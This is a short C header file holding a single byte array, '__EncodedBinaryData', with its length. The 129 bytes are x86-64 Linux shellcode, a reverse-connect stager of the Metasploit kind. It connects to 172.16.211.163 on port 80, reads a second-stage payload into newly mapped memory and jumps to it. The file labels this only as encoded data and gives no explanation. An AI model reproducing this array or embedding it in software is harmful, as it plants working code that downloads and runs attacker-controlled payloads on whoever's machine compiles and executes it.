#ifndef ENCODEDDATA_H
#define ENCODEDDATA_H

unsigned char __EncodedBinaryData[] = {
  0x48, 0x31, 0xff, 0x6a, 0x09, 0x58, 0x99, 0xb6, 0x10, 0x48, 0x89, 0xd6,
  0x4d, 0x31, 0xc9, 0x6a, 0x22, 0x41, 0x5a, 0xb2, 0x07, 0x0f, 0x05, 0x48,
  0x85, 0xc0, 0x78, 0x52, 0x6a, 0x0a, 0x41, 0x59, 0x56, 0x50, 0x6a, 0x29,
  0x58, 0x99, 0x6a, 0x02, 0x5f, 0x6a, 0x01, 0x5e, 0x0f, 0x05, 0x48, 0x85,
  0xc0, 0x78, 0x3b, 0x48, 0x97, 0x48, 0xb9, 0x02, 0x00, 0x00, 0x50, 0xac,
  0x10, 0xd3, 0xa3, 0x51, 0x48, 0x89, 0xe6, 0x6a, 0x10, 0x5a, 0x6a, 0x2a,
  0x58, 0x0f, 0x05, 0x59, 0x48, 0x85, 0xc0, 0x79, 0x25, 0x49, 0xff, 0xc9,
  0x74, 0x18, 0x57, 0x6a, 0x23, 0x58, 0x6a, 0x00, 0x6a, 0x05, 0x48, 0x89,
  0xe7, 0x48, 0x31, 0xf6, 0x0f, 0x05, 0x59, 0x59, 0x5f, 0x48, 0x85, 0xc0,
  0x79, 0xc7, 0x6a, 0x3c, 0x58, 0x6a, 0x01, 0x5f, 0x0f, 0x05, 0x5e, 0x5a,
  0x0f, 0x05, 0x48, 0x85, 0xc0, 0x78, 0xef, 0xff, 0xe6
};
unsigned int __EncodedBinaryData_len = 129;



#endif //ENCODEDDATA_H
